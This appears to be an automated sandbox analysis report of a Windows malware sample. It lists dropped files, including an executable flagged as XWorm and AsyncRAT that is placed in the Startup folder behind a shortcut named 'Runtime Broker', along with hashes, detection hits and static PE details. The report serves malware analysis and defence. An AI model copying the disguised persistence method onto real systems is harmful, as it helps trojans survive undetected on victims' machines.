                                SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                Malicious:false
                                Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mp3nu2q.qxs.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qsvj1gf.xfo.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2raie2df.itw.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0h0czaf.tpf.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl0rknks.k5z.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edtim3ke.rns.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxshsnkd.1jy.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jon3015y.wrs.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpp0aw5t.t0n.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3jos4sw.3tv.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mltc4tud.0y5.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pollnnoj.ntq.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqbv5bvp.he5.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slfqho2y.e1j.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4fq0yir.cum.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvf4i4c5.rnb.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk

                                Download File
                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:12:10 2024, mtime=Sun Oct 13 16:12:10 2024, atime=Sun Oct 13 16:12:10 2024, length=174080, window=hide
                                Category:dropped
                                Size (bytes):994
                                Entropy (8bit):4.690419474617069
                                Encrypted:false
                                SSDEEP:12:84500UlGIwlCICHqXC/0cXx3ACmNYa8Qh6CaNjAw8XZ2Q8aekNv0hEC+44t2YZ/P:8ZtGbj1ZKQhhapAJZ8apv0hEC9qyFm
                                MD5:58997236969EC1ADD46EF15D71EBE846
                                SHA1:0CB320B3A4EC99E6DCEA9BDB3ED9510E2F1179F0
                                SHA-256:F9E62662B3DB93104A000DA133070F427566BDC9A12D13EF05C9E4B9EC71534A
                                SHA-512:55BE6A25AC2BC43DCA5140FD5A32A8062C4D9CCA097038D41F28ADE1275C3212C5D2279EBC89E51A91E6F389D01DF3BF191E16D9B4D831E879830EA5914AE463
                                Malicious:false
                                Preview:L..................F.... .....#.......f.......#..................................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwHMY\.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....CW!H..Public..f......O.IMYW.....+...............<.....r.E.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....f.2.....MY.. .RUNTIM~1..N......MY..MY................................R.u.n.t.i.m.e. .B.r.o.k.e.r.......M...............-.......L...........e.,......C:\Users\Public\Runtime Broker..-.....\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.R.u.n.t.i.m.e. .B.r.o.k.e.r.............!............v..*.cM.jVD.Es.!...`.......X.......878411...........hT..CrF.f4... .#..7.....,.......hT..CrF.f4... .#..7.....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat

                                Download File
                                Process:C:\Users\user\Desktop\80BvHOM51j.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:o:o
                                MD5:69691C7BDCC3CE6D5D8A1361F22D04AC
                                SHA1:C63AE6DD4FC9F9DDA66970E827D13F7C73FE841C
                                SHA-256:08F271887CE94707DA822D5263BAE19D5519CB3614E0DAEDC4C7CE5DAB7473F1
                                SHA-512:253405E03B91441A6DD354A9B72E040068B1BFE10E83EB1A64A086C05525D8CCAE2BF09130C624AF50D55C3522A4FBB7C18CFC8DD843E5F4801D9AD2B5164B12
                                Malicious:false
                                Preview:M

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe

                                Download File
                                Process:C:\Users\user\Desktop\80BvHOM51j.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):174080
                                Entropy (8bit):4.6925997112201365
                                Encrypted:false
                                SSDEEP:1536:oEYwMHUIf/NFDawQTQTwxz5qbTrfKT3B6UlotQFO5uSyEIE4:xl4NFhQiw15qbTevWqO5HhIE4
                                MD5:A9D1FD427561A90037A112B99EDD9D14
                                SHA1:A9B63FFBF0CA8B852C9B23955515684DF4F32DED
                                SHA-256:F25374E1808122200507AE53DE2425884EF5C497CBD9D75A96E8ACC6C5AE5F4B
                                SHA-512:8FCDBDECE6B2AF556E87F70B8621E68BFFDC17CFB98411343988BFBF9E16ACC5376D17568C63F88936FBC6E004E3A0E154F7C537691E4A66B02B5DCB88EA0F9E
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: Joe Security
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 81%
                                • Antivirus: Virustotal, Detection: 66%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..g.............................)... ...@....@.. ....................................@..................................)..W....@............................................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc..............................@..B.................)......H........c..........&.....................................................(....*.r...p*. .O..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*.r...p*. K...*.rI..p*. .}..*.r...p*. ..e.*.r...p*. ..v.*..((...*.r,..p*. S...*.r~..p*. .(h.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&(....&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.r...p*. *Z..*.r2..p*. ....*.r...p*. ..?.*.r...p*. .?N.*.r(..p*. .|..*.rz..p*. ..2.*.r...p*. .(

                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                \Device\ConDrv

                                Download File
                                Process:C:\Users\user\Desktop\80BvHOM51j.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):592
                                Entropy (8bit):2.2838619398241775
                                Encrypted:false
                                SSDEEP:6:I8hgOBtp8hgOB2yHSHRjTaldq71xlMBCjjE/ORnUZALgCCMh9:ICLpCYjTalotMBONRnUZuHrP
                                MD5:62C6B12026E2C2F3645B04936649A4DF
                                SHA1:149B8CAE9D87426785CB4A82C2D460C06FBBAEF6
                                SHA-256:7F38A6E1056349A17D19CF5DE4760F50FAD9C6D71933B1DB24DFE656F0231FC9
                                SHA-512:C3B344ECF560206FD6F89430660D13CCC713A45344D17BB74DABFB20CA16CE12705525E4B541D7D7B02F2AAED8C6209EBBAE2A8B362096FA7A3F43FA8747C0BE
                                Malicious:false
                                Preview:[+] successfully installed..[+] successfully installed.. ____ _ _ _ .. / ___|| |_ ___| | | __ _ _ __ .. \___ \| __/ _ \ | |/ _` | '__|.. ___) | || __/ | | (_| | | .. |____/ \__\___|_|_|\__,_|_| .... 1. Start generating.. 0. Exit..Your choice:

                                Static File Info

                                General

                                File type:PE32+ executable (console) x86-64, for MS Windows
                                Entropy (8bit):5.754513888458882
                                TrID:
                                • Win64 Executable Console (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:80BvHOM51j.exe
                                File size:43'520 bytes
                                MD5:2d4b0911cbb27ea9ef26908f3ce841ad
                                SHA1:04f30253d2a6982a9ac39b94750012ec2b9a1f5e
                                SHA256:2b89bba8e264ad85ed07127f63cc7a711e05867525e4143edddb06dc9bbf2f08
                                SHA512:6492c364c03637aedb6b296abe0d3c2ee9e109ea92463395e733efc36a3a22236e2b1365bb5877c8c887fd71abec48ba99ce16c8b6689d448e93239efe889ab8
                                SSDEEP:768:6fAQXbIAbVDUSA6cTug8oOMvx3ng8EEFifvsPH:HAVU/ig8oOMvpgmH
                                TLSH:B013291B736E40E8D2AAE1BC855B4A57E3B27C0A433153CF039181A60F967C1AF7EB55
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...M...M...M.......M..5N...M..5I...M..5H...M..5L...M...L...M...L...M..4D...M..4....M..4O...M.Rich..M.........PE..d......g...

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x140005e98
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows cui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x670BCFE7 [Sun Oct 13 13:49:27 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:0dfbae3ffe2dfe4be7b5efcf624492c9

                                Entrypoint Preview

                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007FC218AE6A88h
                                dec eax
                                add esp, 28h
                                jmp 00007FC218AE64E7h
                                int3
                                int3
                                dec eax
                                sub esp, 28h
                                call 00007FC218AE70ECh
                                test eax, eax
                                je 00007FC218AE6693h
                                dec eax
                                mov eax, dword ptr [00000030h]
                                dec eax
                                mov ecx, dword ptr [eax+08h]
                                jmp 00007FC218AE6677h
                                dec eax
                                cmp ecx, eax
                                je 00007FC218AE6686h
                                xor eax, eax
                                dec eax
                                cmpxchg dword ptr [00005490h], ecx
                                jne 00007FC218AE6660h
                                xor al, al
                                dec eax
                                add esp, 28h
                                ret
                                mov al, 01h
                                jmp 00007FC218AE6669h
                                int3
                                int3
                                int3
                                dec eax
                                sub esp, 28h
                                test ecx, ecx
                                jne 00007FC218AE6679h
                                mov byte ptr [00005479h], 00000001h
                                call 00007FC218AE6DD9h
                                call 00007FC218AE6AF8h
                                test al, al
                                jne 00007FC218AE6676h
                                xor al, al
                                jmp 00007FC218AE6686h
                                call 00007FC218AE6AEBh
                                test al, al
                                jne 00007FC218AE667Bh
                                xor ecx, ecx
                                call 00007FC218AE6AE0h
                                jmp 00007FC218AE665Ch
                                mov al, 01h
                                dec eax
                                add esp, 28h
                                ret
                                int3
                                int3
                                inc eax
                                push ebx
                                dec eax
                                sub esp, 20h
                                cmp byte ptr [00005440h], 00000000h
                                mov ebx, ecx
                                jne 00007FC218AE66D9h
                                cmp ecx, 01h
                                jnbe 00007FC218AE66DCh
                                call 00007FC218AE7062h
                                test eax, eax
                                je 00007FC218AE669Ah
                                test ebx, ebx
                                jne 00007FC218AE6696h
                                dec eax
                                lea ecx, dword ptr [0000542Ah]
                                call 00007FC218AE7110h
                                test eax, eax
                                jne 00007FC218AE6682h
                                dec eax
                                lea ecx, dword ptr [00005432h]
                                call 00007FC218AE6700h

                                Rich Headers

                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8ee40x154.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd0000x1e0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xc0000x618.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000x94.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x7ab00x38.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x79700x140.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x480.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x5feb0x600055355479699fd9c256cb0801a7e34fbfFalse0.5220133463541666data6.098623004371383IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x70000x35c60x360008e2716b486a0f9a79d5f84ba9205e3aFalse0.37680844907407407COM executable for DOS4.761765837799673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xb0000x9780x40027fd85241f93061e4004e8a94b1612e7False0.2197265625DOS executable (block device driver)3.114880833561306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata0xc0000x6180x80034f04cea4fc65e0cbe59cb73a4330968False0.38037109375PEX Binary Archive3.5384288082031192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0xd0000x1e00x20044e3d39532c9319314b3e7669556d25aFalse0.529296875data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xe0000x940x200c87eab5a590b0327111d65cb7d4120fdFalse0.2890625data2.034784991624018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0xd0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                Imports

                                DLLImport
